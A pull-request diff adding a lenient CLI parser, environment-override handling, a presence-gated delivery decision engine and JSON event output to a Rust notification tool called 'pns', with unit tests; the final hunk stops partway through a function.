### PR TITLE
feat(pns): the engine binary and its composition root

### DIFF
--- a/dot_local/share/pns/Cargo.lock
+++ b/dot_local/share/pns/Cargo.lock
@@ -25,9 +25,22 @@ dependencies = [
 ]
 
 [[package]]
+name = "itoa"
+version = "1.0.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682"
+
+[[package]]
+name = "memchr"
+version = "2.8.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cf8baf1c55e62ffcace7a9f06f4bd9cd3f0c4beb022d3b367256b91b87513d98"
+
+[[package]]
 name = "pns"
 version = "0.1.0"
 dependencies = [
+ "serde_json",
  "toml",
 ]
 
@@ -50,6 +63,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "serde"
+version = "1.0.229"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4148590afebada386688f18773da617792bf2ef03ffc1e4cbd2b1d45b023e0ba"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
 name = "serde_core"
 version = "1.0.229"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -67,6 +89,19 @@ dependencies = [
  "proc-macro2",
  "quote",
  "syn",
+]
+
+[[package]]
+name = "serde_json"
+version = "1.0.151"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c841b55ecdae098c80dcae9cf767f6f8a0c2cdb3416bbef72181df4d0fe73f14"
+dependencies = [
+ "itoa",
+ "memchr",
+ "serde",
+ "serde_core",
+ "zmij",
 ]
 
 [[package]]
@@ -139,3 +174,9 @@ name = "winnow"
 version = "1.0.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "23b97319f7b8343df12cc98938e5c3eb436064524c8d2b4e30a1d3a36eecdf81"
+
+[[package]]
+name = "zmij"
+version = "1.0.23"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "29666d0abbfad1e3dc4dcf6144730dd3a3ab225bbbdac83319345b1b44ccfc1b"

--- a/dot_local/share/pns/Cargo.toml
+++ b/dot_local/share/pns/Cargo.toml
@@ -1,10 +1,9 @@
-# The pns decision core plus its probe edge. Library only: the engine binary
-# and dispatch arrive with later slices.
+# pns: the decision core, its edges, and the engine binary.
 #
-# ONE DEPENDENCY, taken where the format demands it: the config edge parses
-# TOML through the standard crate. The decision core and the probe edge run
-# on std alone, and that split is a property to keep: a new dependency needs
-# a layer whose format genuinely requires one.
+# TWO DEPENDENCIES, each taken where a format demands it: the config edge
+# parses TOML and the event contract is JSON. The decision core and the
+# probe edge run on std alone, and that split is the property to keep: a
+# new dependency needs a layer whose format genuinely requires one.
 
 [package]
 name = "pns"

--- a/dot_local/share/pns/Cargo.toml
+++ b/dot_local/share/pns/Cargo.toml
@@ -12,6 +12,7 @@ version = "0.1.0"
 edition = "2024"
 
 [dependencies]
+serde_json = "1.0.151"
 # Parse only: the default `display` feature pulls toml_writer, and nothing here
 # ever writes TOML back out. `serde` stays because `toml::Table` and
 # `toml::Value` are gated behind it.

--- a/dot_local/share/pns/src/args.rs
+++ b/dot_local/share/pns/src/args.rs
@@ -1,0 +1,108 @@
+//! relay's CLI contract, ported verbatim: lenient, warning, never fatal.
+//!
+//! The engine sits on an always-exit-0 notification path, so argument
+//! problems WARN and degrade rather than abort. Three rules carry the
+//! contract: a value-taking flag whose next token is missing or is itself a
+//! RECOGNIZED flag is warned about and ignored WITHOUT consuming that token
+//! (consuming it would silently drop the real flag, e.g. leak an event a
+//! caller narrowed with `--pane --local-only`); an unrecognized next token
+//! IS taken as the value, the leniency the bash deliberately retained; and
+//! any other unknown argument is skipped silently.
+
+/// The parsed event arguments. Every field defaults to empty or false, so a
+/// bare invocation is valid and renders an empty event.
+#[derive(Debug, Default, PartialEq)]
+pub struct EventArgs {
+    pub agent: String,
+    pub state: String,
+    pub project: String,
+    pub branch: String,
+    pub detail: String,
+    pub pane: String,
+    pub local_only: bool,
+    pub remote_only: bool,
+}
+
+/// Parse argv (without the program name). Returns the arguments plus the
+/// warnings to print to stderr, one per ignored flag.
+pub fn parse_args<I>(argv: I) -> (EventArgs, Vec<String>)
+where
+    I: IntoIterator<Item = String>,
+{
+    let _ = argv.into_iter();
+    todo!("R2d: the lenient relay contract")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::parse_args;
+
+    fn args(tokens: &[&str]) -> (super::EventArgs, Vec<String>) {
+        parse_args(tokens.iter().map(|t| t.to_string()))
+    }
+
+    #[test]
+    fn every_value_flag_lands_in_its_field() {
+        let (parsed, warnings) = args(&[
+            "--agent",
+            "claude",
+            "--state",
+            "done",
+            "--project",
+            "dotfiles",
+            "--branch",
+            "main",
+            "--detail",
+            "a summary",
+            "--pane",
+            "wW:p21",
+            "--local-only",
+        ]);
+        assert_eq!(parsed.agent, "claude");
+        assert_eq!(parsed.state, "done");
+        assert_eq!(parsed.project, "dotfiles");
+        assert_eq!(parsed.branch, "main");
+        assert_eq!(parsed.detail, "a summary");
+        assert_eq!(parsed.pane, "wW:p21");
+        assert!(parsed.local_only);
+        assert!(!parsed.remote_only);
+        assert!(warnings.is_empty());
+    }
+
+    #[test]
+    fn a_recognized_flag_is_never_consumed_as_a_value() {
+        // `--pane --local-only`: eating the narrowing flag as the pane value
+        // would deliver an event the caller asked to keep local.
+        let (parsed, warnings) = args(&["--pane", "--local-only", "--agent", "claude"]);
+        assert_eq!(parsed.pane, "");
+        assert!(parsed.local_only, "the narrowing flag must still apply");
+        assert_eq!(parsed.agent, "claude");
+        assert_eq!(warnings.len(), 1);
+        assert!(warnings[0].contains("--pane"), "the warning names the flag");
+    }
+
+    #[test]
+    fn a_trailing_value_flag_is_warned_and_ignored() {
+        let (parsed, warnings) = args(&["--agent", "claude", "--detail"]);
+        assert_eq!(parsed.agent, "claude");
+        assert_eq!(parsed.detail, "");
+        assert_eq!(warnings.len(), 1);
+        assert!(warnings[0].contains("--detail"));
+    }
+
+    #[test]
+    fn an_unrecognized_token_is_still_taken_as_a_value() {
+        // The bash deliberately kept this leniency: only RECOGNIZED flags are
+        // protected from being eaten.
+        let (parsed, warnings) = args(&["--agent", "--bogus"]);
+        assert_eq!(parsed.agent, "--bogus");
+        assert!(warnings.is_empty());
+    }
+
+    #[test]
+    fn unknown_arguments_are_skipped_in_silence() {
+        let (parsed, warnings) = args(&["stray", "--agent", "claude", "--wat"]);
+        assert_eq!(parsed.agent, "claude");
+        assert!(warnings.is_empty());
+    }
+}

--- a/dot_local/share/pns/src/args.rs
+++ b/dot_local/share/pns/src/args.rs
@@ -29,8 +29,46 @@ pub fn parse_args<I>(argv: I) -> (EventArgs, Vec<String>)
 where
     I: IntoIterator<Item = String>,
 {
-    let _ = argv.into_iter();
-    todo!("R2d: the lenient relay contract")
+    const VALUE_FLAGS: [&str; 6] = [
+        "--agent",
+        "--state",
+        "--project",
+        "--branch",
+        "--detail",
+        "--pane",
+    ];
+    let recognized = |token: &str| {
+        VALUE_FLAGS.contains(&token) || token == "--local-only" || token == "--remote-only"
+    };
+
+    let mut parsed = EventArgs::default();
+    let mut warnings = Vec::new();
+    let mut tokens = argv.into_iter().peekable();
+    while let Some(token) = tokens.next() {
+        match token.as_str() {
+            "--local-only" => parsed.local_only = true,
+            "--remote-only" => parsed.remote_only = true,
+            flag if VALUE_FLAGS.contains(&flag) => {
+                // Missing, or a recognized flag standing where the value
+                // should be: warn and leave the token for its own arm.
+                if tokens.peek().is_none_or(|next| recognized(next)) {
+                    warnings.push(format!("{flag} given without a value; ignoring"));
+                    continue;
+                }
+                let Some(value) = tokens.next() else { continue };
+                match flag {
+                    "--agent" => parsed.agent = value,
+                    "--state" => parsed.state = value,
+                    "--project" => parsed.project = value,
+                    "--branch" => parsed.branch = value,
+                    "--detail" => parsed.detail = value,
+                    _ => parsed.pane = value,
+                }
+            }
+            _ => {}
+        }
+    }
+    (parsed, warnings)
 }
 
 #[cfg(test)]

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -196,8 +196,33 @@ pub fn select_plugins(
     registry: &crate::registry::Registry,
     loaded: Result<crate::config::LoadOutcome, crate::config::ConfigError>,
 ) -> (Selection, Option<String>) {
-    let _ = (registry, loaded);
-    todo!("R2d: loaded is authoritative, missing is the roster, broken is loud plus the roster")
+    use crate::config::{ConfigError, LoadOutcome};
+    use crate::registry::RegistryError;
+
+    match loaded {
+        Ok(LoadOutcome::Loaded(config)) => match registry.enabled(&config) {
+            Ok(selection) => (selection, None),
+            Err(error) => {
+                let detail = match error {
+                    RegistryError::UnknownPlugin(name) => format!("unknown plugin `{name}`"),
+                    RegistryError::Duplicate(name) => format!("duplicate plugin `{name}`"),
+                };
+                (registry.all(), Some(roster_warning(&detail)))
+            }
+        },
+        Ok(LoadOutcome::Missing) => (registry.all(), None),
+        Err(
+            ConfigError::Malformed(detail)
+            | ConfigError::Invalid(detail)
+            | ConfigError::Unreadable(detail),
+        ) => (registry.all(), Some(roster_warning(&detail))),
+    }
+}
+
+/// The one line a broken config prints: what was wrong, and that nothing was
+/// turned off because of it.
+fn roster_warning(detail: &str) -> String {
+    format!("pns: config error ({detail}); running every built-in plugin")
 }
 
 /// One leg's event, as the JSON object the channel contract specifies.

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -225,6 +225,15 @@ fn roster_warning(detail: &str) -> String {
     format!("pns: config error ({detail}); running every built-in plugin")
 }
 
+/// A path from the environment, defaulting like bash's `${VAR:-default}`:
+/// EMPTY means the default as much as unset does, because joining a filename
+/// to an empty path resolves into the current directory and quietly delivers
+/// nothing.
+pub fn resolve_path(candidate: Option<&str>, default: &str) -> std::path::PathBuf {
+    let _ = (candidate, default);
+    todo!("R2d fix round: empty and unset both mean the default")
+}
+
 /// One leg's event, as the JSON object the channel contract specifies.
 /// The pane is the SANITIZED one: an unsafe id was already dropped.
 #[allow(clippy::too_many_arguments)]
@@ -443,6 +452,8 @@ mod tests {
             Some(1_000_000),
         );
         assert_eq!(names(&decision), vec!["moshi", "hermes", "macos-banner"]);
+        // The marker alone decided; the one-second sample must not also run.
+        assert_eq!(probes.sample_reads.get(), 0);
     }
 
     #[test]
@@ -715,16 +726,109 @@ mod tests {
     // --- overrides parsing --------------------------------------------------
 
     #[test]
-    fn a_garbage_numeric_override_reads_as_absent_never_zero() {
-        // Zero idle reads as "actively typing" and suppresses the push; a
-        // garbled value must instead leave the probe to answer.
+    fn a_garbage_idle_override_is_unknown_without_a_probe_read() {
+        // Bash keeps a non-empty override and never runs the probe; the
+        // garbled value then fails open in wants_phone. Falling back to the
+        // probe would both pay the read and let a live reading suppress the
+        // push the unknown should have sent.
+        let vars = BTreeMap::from([("RELAY_IDLE_SECS".to_string(), "not-a-number".to_string())]);
+        let overrides = Overrides::from_env(&vars);
+        let probes = CountingProbes {
+            idle: Some(5),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &overrides,
+            false,
+            false,
+            "",
+            Some(1_000_000),
+        );
+        assert_eq!(probes.idle_reads.get(), 0);
+        assert!(names(&decision).contains(&"moshi"), "unknown fails open");
+    }
+
+    #[test]
+    fn a_garbage_desk_threshold_fails_open_never_into_the_default() {
+        // Bash rejects the garbled threshold and sends the push; substituting
+        // the 120 default would instead read idle 60 as "at the desk" and
+        // suppress it.
         let vars = BTreeMap::from([
-            ("RELAY_IDLE_SECS".to_string(), "not-a-number".to_string()),
-            ("RELAY_DESK_IDLE_SECS".to_string(), "120".to_string()),
+            ("RELAY_IDLE_SECS".to_string(), "60".to_string()),
+            ("RELAY_DESK_IDLE_SECS".to_string(), "garbage".to_string()),
         ]);
         let overrides = Overrides::from_env(&vars);
-        assert_eq!(overrides.idle_secs, None);
-        assert_eq!(overrides.desk_idle_secs, Some(120));
+        let probes = CountingProbes::default();
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &overrides,
+            false,
+            false,
+            "",
+            Some(1_000_000),
+        );
+        assert!(names(&decision).contains(&"moshi"), "unknown fails open");
+    }
+
+    #[test]
+    fn a_selection_with_no_gated_leg_pays_for_no_presence_reading_at_all() {
+        // A hermes-only config makes the phone verdict unable to change the
+        // plan, so no probe may run: the one-second sample on every log-only
+        // event would be the exact cost the laziness header forbids.
+        let mut registry = Registry::new();
+        registry
+            .register(
+                "hermes",
+                Routing {
+                    local: false,
+                    presence_gated: false,
+                    durable: true,
+                },
+            )
+            .unwrap();
+        let selection = registry
+            .enabled(&parse_config("[plugins.hermes]\nenabled = true\n").unwrap())
+            .unwrap();
+        let probes = CountingProbes {
+            idle: Some(60),
+            marker_mtime: Some(999_990),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &selection,
+            &Overrides::default(),
+            false,
+            false,
+            "wW:p21",
+            Some(1_000_000),
+        );
+        assert_eq!(names(&decision), vec!["hermes"]);
+        assert_eq!(probes.idle_reads.get(), 0);
+        assert_eq!(probes.marker_reads.get(), 0);
+        assert_eq!(probes.sample_reads.get(), 0);
+        assert_eq!(probes.focused_reads.get(), 0);
+    }
+
+    #[test]
+    fn an_empty_channels_dir_variable_means_the_default_not_the_current_dir() {
+        // Bash's ${VAR:-default} defaults on EMPTY as well as unset; joining
+        // a filename to an empty path would quietly deliver nothing.
+        assert_eq!(
+            super::resolve_path(Some(""), "/fallback/channels"),
+            std::path::PathBuf::from("/fallback/channels")
+        );
+        assert_eq!(
+            super::resolve_path(None, "/fallback/channels"),
+            std::path::PathBuf::from("/fallback/channels")
+        );
+        assert_eq!(
+            super::resolve_path(Some("/set/dir"), "/fallback/channels"),
+            std::path::PathBuf::from("/set/dir")
+        );
     }
 
     #[test]

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -21,6 +21,10 @@ use crate::probes::{FocusedPaneProbe, IdleProbe, MoshRateProbe, PhoneMarkerProbe
 use crate::registry::Selection;
 use crate::routing::Leg;
 
+/// The idle threshold the bash defaults to when `RELAY_DESK_IDLE_SECS` says
+/// nothing: past this the operator counts as away from the desk.
+const DEFAULT_DESK_IDLE_SECS: u64 = 120;
+
 /// Everything the environment may override, parsed once at the edge.
 /// Garbage numeric values read as absent, never as zero.
 #[derive(Debug, Default, PartialEq)]
@@ -40,8 +44,28 @@ pub struct Overrides {
 impl Overrides {
     /// Parse the RELAY_* and PNS_* variables out of an environment map.
     pub fn from_env(vars: &BTreeMap<String, String>) -> Self {
-        let _ = vars;
-        todo!("R2d: parse overrides; a garbage number is absent, never zero")
+        let count = |key: &str| vars.get(key).and_then(|raw| crate::parse_count(raw));
+        let set = |key: &str| vars.get(key).is_some_and(|raw| !raw.is_empty());
+        let forced = |key: &str| match vars.get(key).map(String::as_str) {
+            Some("1") => Some(true),
+            Some("0") => Some(false),
+            _ => None,
+        };
+        Self {
+            idle_secs: count("RELAY_IDLE_SECS"),
+            desk_idle_secs: count("RELAY_DESK_IDLE_SECS"),
+            skip_phone: set("RELAY_SKIP_PHONE"),
+            force_phone: set("RELAY_FORCE_PHONE"),
+            phone_attention: forced("RELAY_PHONE_ATTENTION"),
+            moshi_viewing: forced("RELAY_MOSHI_VIEWING"),
+            focused_pane: vars
+                .get("RELAY_HERDR_FOCUSED_PANE")
+                .filter(|pane| !pane.is_empty())
+                .cloned(),
+            marker_ttl_secs: count("PNS_PHONE_MARKER_TTL"),
+            attention_floor_bytes: count("PNS_ATTENTION_FLOOR_BYTES"),
+            physical_fresh_secs: count("PNS_PHYSICAL_FRESH_SECS"),
+        }
     }
 }
 
@@ -70,16 +94,92 @@ pub fn decide<P>(
 where
     P: IdleProbe + PhoneMarkerProbe + MoshRateProbe + FocusedPaneProbe,
 {
-    let _ = (
-        probes,
-        selection,
-        overrides,
-        local_only,
-        remote_only,
-        pane,
-        now_secs,
-    );
-    todo!("R2d: compose the decision core over the probe seams")
+    use crate::presence::{
+        DEFAULT_ATTENTION_FLOOR_BYTES, DEFAULT_PHONE_MARKER_TTL_SECS, DEFAULT_PHYSICAL_FRESH_SECS,
+        attention_band, marker_fresh, mosh_rate_active, moshi_viewing, phone_attention,
+    };
+
+    let desk_idle_secs = Some(overrides.desk_idle_secs.unwrap_or(DEFAULT_DESK_IDLE_SECS));
+    let decided_without_a_reading =
+        local_only || remote_only || overrides.skip_phone || overrides.force_phone;
+    let idle_secs = match overrides.idle_secs {
+        Some(secs) => Some(secs),
+        None if decided_without_a_reading => None,
+        None => probes.idle_secs(),
+    };
+
+    // Skip beats force, so it gates the whole verdict rather than riding in
+    // as another argument.
+    let mut want_phone = !overrides.skip_phone
+        && crate::routing::wants_phone(
+            idle_secs,
+            desk_idle_secs,
+            local_only,
+            remote_only,
+            overrides.force_phone,
+        );
+
+    // Each reading is guarded by the verdict that would discard it, so a
+    // forced answer never pays for the probe underneath it.
+    let viewing_now = || {
+        let rate_active = overrides.moshi_viewing.is_none()
+            && probes.sample_csv().is_some_and(|csv| {
+                mosh_rate_active(
+                    &csv,
+                    overrides
+                        .attention_floor_bytes
+                        .unwrap_or(DEFAULT_ATTENTION_FLOOR_BYTES),
+                )
+            });
+        moshi_viewing(overrides.moshi_viewing, rate_active)
+    };
+
+    if !want_phone
+        && !local_only
+        && !remote_only
+        && !overrides.skip_phone
+        && attention_band(
+            idle_secs,
+            desk_idle_secs,
+            Some(
+                overrides
+                    .physical_fresh_secs
+                    .unwrap_or(DEFAULT_PHYSICAL_FRESH_SECS),
+            ),
+        )
+    {
+        let marker_is_fresh = overrides.phone_attention.is_none()
+            && marker_fresh(
+                probes.marker_mtime_secs(),
+                now_secs,
+                Some(
+                    overrides
+                        .marker_ttl_secs
+                        .unwrap_or(DEFAULT_PHONE_MARKER_TTL_SECS),
+                ),
+            );
+        // The marker is a stat of one file; the sample is a full second of
+        // live counters, so it runs only once the marker has said nothing.
+        let viewing = overrides.phone_attention.is_none() && !marker_is_fresh && viewing_now();
+        want_phone = phone_attention(overrides.phone_attention, marker_is_fresh, viewing);
+    }
+
+    if want_phone && !overrides.force_phone && !pane.is_empty() {
+        let focused = match &overrides.focused_pane {
+            Some(pane) => Some(pane.clone()),
+            None => probes.focused_pane(),
+        };
+        if crate::routing::viewed_pane_redundant(pane, &focused.unwrap_or_default())
+            && viewing_now()
+        {
+            want_phone = false;
+        }
+    }
+
+    Decision {
+        legs: crate::routing::channel_plan(selection, local_only, remote_only, want_phone),
+        pane_dropped: !pane.is_empty() && !crate::safety::pane_is_safe(pane),
+    }
 }
 
 /// One leg's event, as the JSON object the channel contract specifies.
@@ -97,10 +197,19 @@ pub fn event_json(
     pane: &str,
     mode: &str,
 ) -> String {
-    let _ = (
-        agent, state, project, branch, detail, title, message, preview, pane, mode,
-    );
-    todo!("R2d: the channel contract's JSON object")
+    serde_json::json!({
+        "agent": agent,
+        "state": state,
+        "project": project,
+        "branch": branch,
+        "detail": detail,
+        "title": title,
+        "message": message,
+        "preview": preview,
+        "pane": pane,
+        "mode": mode,
+    })
+    .to_string()
 }
 
 #[cfg(test)]

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -39,21 +39,43 @@ pub struct Overrides {
     pub marker_ttl_secs: Option<u64>,
     pub attention_floor_bytes: Option<u64>,
     pub physical_fresh_secs: Option<u64>,
+    /// Set when the variable was PRESENT and non-empty but not a count. The
+    /// bash validators reject such a value outright rather than falling back,
+    /// and the fallback is what would turn an unknown into a confident
+    /// number: a probe reading where the caller overrode it, or a default
+    /// threshold where the caller's was garbled.
+    pub idle_invalid: bool,
+    pub desk_invalid: bool,
+    pub ttl_invalid: bool,
+    pub fresh_invalid: bool,
 }
 
 impl Overrides {
     /// Parse the RELAY_* and PNS_* variables out of an environment map.
     pub fn from_env(vars: &BTreeMap<String, String>) -> Self {
-        let count = |key: &str| vars.get(key).and_then(|raw| crate::parse_count(raw));
+        // A present-but-garbled value is reported alongside the None, so the
+        // caller can refuse it rather than fall back to a default.
+        let read = |key: &str| match vars.get(key).filter(|raw| !raw.is_empty()) {
+            None => (None, false),
+            Some(raw) => {
+                let parsed = crate::parse_count(raw);
+                (parsed, parsed.is_none())
+            }
+        };
+        let count = |key: &str| read(key).0;
         let set = |key: &str| vars.get(key).is_some_and(|raw| !raw.is_empty());
         let forced = |key: &str| match vars.get(key).map(String::as_str) {
             Some("1") => Some(true),
             Some("0") => Some(false),
             _ => None,
         };
+        let (idle_secs, idle_invalid) = read("RELAY_IDLE_SECS");
+        let (desk_idle_secs, desk_invalid) = read("RELAY_DESK_IDLE_SECS");
+        let (marker_ttl_secs, ttl_invalid) = read("PNS_PHONE_MARKER_TTL");
+        let (physical_fresh_secs, fresh_invalid) = read("PNS_PHYSICAL_FRESH_SECS");
         Self {
-            idle_secs: count("RELAY_IDLE_SECS"),
-            desk_idle_secs: count("RELAY_DESK_IDLE_SECS"),
+            idle_secs,
+            desk_idle_secs,
             skip_phone: set("RELAY_SKIP_PHONE"),
             force_phone: set("RELAY_FORCE_PHONE"),
             phone_attention: forced("RELAY_PHONE_ATTENTION"),
@@ -62,9 +84,15 @@ impl Overrides {
                 .get("RELAY_HERDR_FOCUSED_PANE")
                 .filter(|pane| !pane.is_empty())
                 .cloned(),
-            marker_ttl_secs: count("PNS_PHONE_MARKER_TTL"),
+            marker_ttl_secs,
+            // The floor alone keeps the plain fallback: bash reads it with
+            // the same `${VAR:-100}` and never validates it separately.
             attention_floor_bytes: count("PNS_ATTENTION_FLOOR_BYTES"),
-            physical_fresh_secs: count("PNS_PHYSICAL_FRESH_SECS"),
+            physical_fresh_secs,
+            idle_invalid,
+            desk_invalid,
+            ttl_invalid,
+            fresh_invalid,
         }
     }
 }
@@ -99,80 +127,103 @@ where
         attention_band, marker_fresh, mosh_rate_active, moshi_viewing, phone_attention,
     };
 
-    let desk_idle_secs = Some(overrides.desk_idle_secs.unwrap_or(DEFAULT_DESK_IDLE_SECS));
-    let decided_without_a_reading =
-        local_only || remote_only || overrides.skip_phone || overrides.force_phone;
-    let idle_secs = match overrides.idle_secs {
-        Some(secs) => Some(secs),
-        None if decided_without_a_reading => None,
-        None => probes.idle_secs(),
+    // A garbled threshold is UNKNOWN, never the default: substituting 120
+    // would read an at-desk idle as suppressing a push the bash sends.
+    let desk_idle_secs = if overrides.desk_invalid {
+        None
+    } else {
+        Some(overrides.desk_idle_secs.unwrap_or(DEFAULT_DESK_IDLE_SECS))
     };
 
-    // Skip beats force, so it gates the whole verdict rather than riding in
-    // as another argument.
-    let mut want_phone = !overrides.skip_phone
-        && crate::routing::wants_phone(
-            idle_secs,
-            desk_idle_secs,
-            local_only,
-            remote_only,
-            overrides.force_phone,
-        );
-
-    // Each reading is guarded by the verdict that would discard it, so a
-    // forced answer never pays for the probe underneath it.
-    let viewing_now = || {
-        let rate_active = overrides.moshi_viewing.is_none()
-            && probes.sample_csv().is_some_and(|csv| {
-                mosh_rate_active(
-                    &csv,
-                    overrides
-                        .attention_floor_bytes
-                        .unwrap_or(DEFAULT_ATTENTION_FLOOR_BYTES),
-                )
-            });
-        moshi_viewing(overrides.moshi_viewing, rate_active)
-    };
-
-    if !want_phone
-        && !local_only
-        && !remote_only
-        && !overrides.skip_phone
-        && attention_band(
-            idle_secs,
-            desk_idle_secs,
-            Some(
-                overrides
-                    .physical_fresh_secs
-                    .unwrap_or(DEFAULT_PHYSICAL_FRESH_SECS),
-            ),
-        )
-    {
-        let marker_is_fresh = overrides.phone_attention.is_none()
-            && marker_fresh(
-                probes.marker_mtime_secs(),
-                now_secs,
-                Some(
-                    overrides
-                        .marker_ttl_secs
-                        .unwrap_or(DEFAULT_PHONE_MARKER_TTL_SECS),
-                ),
-            );
-        // The marker is a stat of one file; the sample is a full second of
-        // live counters, so it runs only once the marker has said nothing.
-        let viewing = overrides.phone_attention.is_none() && !marker_is_fresh && viewing_now();
-        want_phone = phone_attention(overrides.phone_attention, marker_is_fresh, viewing);
-    }
-
-    if want_phone && !overrides.force_phone && !pane.is_empty() {
-        let focused = match &overrides.focused_pane {
-            Some(pane) => Some(pane.clone()),
-            None => probes.focused_pane(),
+    // No selected leg is presence-gated, so the phone verdict cannot change
+    // the plan and no presence reading may be paid for.
+    let mut want_phone = false;
+    if selection.iter().any(|entry| entry.routing.presence_gated) {
+        let decided_without_a_reading = local_only
+            || remote_only
+            || overrides.skip_phone
+            || overrides.force_phone
+            || overrides.idle_invalid;
+        let idle_secs = match overrides.idle_secs {
+            Some(secs) => Some(secs),
+            None if decided_without_a_reading => None,
+            None => probes.idle_secs(),
         };
-        if crate::routing::viewed_pane_redundant(pane, &focused.unwrap_or_default())
-            && viewing_now()
+
+        // Skip beats force, so it gates the whole verdict rather than riding
+        // in as another argument.
+        want_phone = !overrides.skip_phone
+            && crate::routing::wants_phone(
+                idle_secs,
+                desk_idle_secs,
+                local_only,
+                remote_only,
+                overrides.force_phone,
+            );
+
+        // Each reading is guarded by the verdict that would discard it, so a
+        // forced answer never pays for the probe underneath it.
+        let viewing_now = || {
+            let rate_active = overrides.moshi_viewing.is_none()
+                && probes.sample_csv().is_some_and(|csv| {
+                    mosh_rate_active(
+                        &csv,
+                        overrides
+                            .attention_floor_bytes
+                            .unwrap_or(DEFAULT_ATTENTION_FLOOR_BYTES),
+                    )
+                });
+            moshi_viewing(overrides.moshi_viewing, rate_active)
+        };
+
+        if !want_phone
+            && !local_only
+            && !remote_only
+            && !overrides.skip_phone
+            && attention_band(
+                idle_secs,
+                desk_idle_secs,
+                if overrides.fresh_invalid {
+                    None
+                } else {
+                    Some(
+                        overrides
+                            .physical_fresh_secs
+                            .unwrap_or(DEFAULT_PHYSICAL_FRESH_SECS),
+                    )
+                },
+            )
         {
-            want_phone = false;
+            let marker_is_fresh = overrides.phone_attention.is_none()
+                && marker_fresh(
+                    probes.marker_mtime_secs(),
+                    now_secs,
+                    if overrides.ttl_invalid {
+                        None
+                    } else {
+                        Some(
+                            overrides
+                                .marker_ttl_secs
+                                .unwrap_or(DEFAULT_PHONE_MARKER_TTL_SECS),
+                        )
+                    },
+                );
+            // The marker is a stat of one file; the sample is a full second
+            // of live counters, so it runs only once the marker said nothing.
+            let viewing = overrides.phone_attention.is_none() && !marker_is_fresh && viewing_now();
+            want_phone = phone_attention(overrides.phone_attention, marker_is_fresh, viewing);
+        }
+
+        if want_phone && !overrides.force_phone && !pane.is_empty() {
+            let focused = match &overrides.focused_pane {
+                Some(pane) => Some(pane.clone()),
+                None => probes.focused_pane(),
+            };
+            if crate::routing::viewed_pane_redundant(pane, &focused.unwrap_or_default())
+                && viewing_now()
+            {
+                want_phone = false;
+            }
         }
     }
 
@@ -230,8 +281,11 @@ fn roster_warning(detail: &str) -> String {
 /// to an empty path resolves into the current directory and quietly delivers
 /// nothing.
 pub fn resolve_path(candidate: Option<&str>, default: &str) -> std::path::PathBuf {
-    let _ = (candidate, default);
-    todo!("R2d fix round: empty and unset both mean the default")
+    std::path::PathBuf::from(
+        candidate
+            .filter(|value| !value.is_empty())
+            .unwrap_or(default),
+    )
 }
 
 /// One leg's event, as the JSON object the channel contract specifies.

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -1,0 +1,494 @@
+//! The engine: one event in, a delivery plan out, every decision delegated.
+//!
+//! This module ORCHESTRATES the decision core against the probe seams; it
+//! owns no policy of its own. Two properties are load-bearing and pinned by
+//! recording probes rather than by outcomes alone:
+//!
+//! PROBES RUN ONLY WHEN THEIR ANSWER COULD MATTER. The idle probe is an
+//! unbounded pipe on a path that must never stall; a caller that already
+//! decided the phone leg (narrowing flags, skip, force, an idle override)
+//! must not pay for a reading it cannot use. The attention probes are
+//! confined to the one band where they can change the verdict, and the
+//! one-second viewing sample runs only when the panes already match.
+//!
+//! CALLER INTENT IS NEVER OVERRIDDEN. Skip beats force ("I already sent it"
+//! is more specific than an override), the narrowing flags beat both, and
+//! force exempts the event from viewed-pane suppression.
+
+use std::collections::BTreeMap;
+
+use crate::probes::{FocusedPaneProbe, IdleProbe, MoshRateProbe, PhoneMarkerProbe};
+use crate::registry::Selection;
+use crate::routing::Leg;
+
+/// Everything the environment may override, parsed once at the edge.
+/// Garbage numeric values read as absent, never as zero.
+#[derive(Debug, Default, PartialEq)]
+pub struct Overrides {
+    pub idle_secs: Option<u64>,
+    pub desk_idle_secs: Option<u64>,
+    pub skip_phone: bool,
+    pub force_phone: bool,
+    pub phone_attention: Option<bool>,
+    pub moshi_viewing: Option<bool>,
+    pub focused_pane: Option<String>,
+    pub marker_ttl_secs: Option<u64>,
+    pub attention_floor_bytes: Option<u64>,
+    pub physical_fresh_secs: Option<u64>,
+}
+
+impl Overrides {
+    /// Parse the RELAY_* and PNS_* variables out of an environment map.
+    pub fn from_env(vars: &BTreeMap<String, String>) -> Self {
+        let _ = vars;
+        todo!("R2d: parse overrides; a garbage number is absent, never zero")
+    }
+}
+
+/// What the engine decided for one event.
+#[derive(Debug, PartialEq)]
+pub struct Decision {
+    /// The legs to dispatch, in delivery order.
+    pub legs: Vec<Leg>,
+    /// The pane was dropped from the event because it failed the safety
+    /// check; the caller prints the one warning.
+    pub pane_dropped: bool,
+}
+
+/// Decide the plan for one event. `now_secs` is the wall clock, taken once
+/// at the edge; `None` reads as an unreadable clock and fails the marker
+/// check closed.
+pub fn decide<P>(
+    probes: &P,
+    selection: &Selection,
+    overrides: &Overrides,
+    local_only: bool,
+    remote_only: bool,
+    pane: &str,
+    now_secs: Option<u64>,
+) -> Decision
+where
+    P: IdleProbe + PhoneMarkerProbe + MoshRateProbe + FocusedPaneProbe,
+{
+    let _ = (
+        probes,
+        selection,
+        overrides,
+        local_only,
+        remote_only,
+        pane,
+        now_secs,
+    );
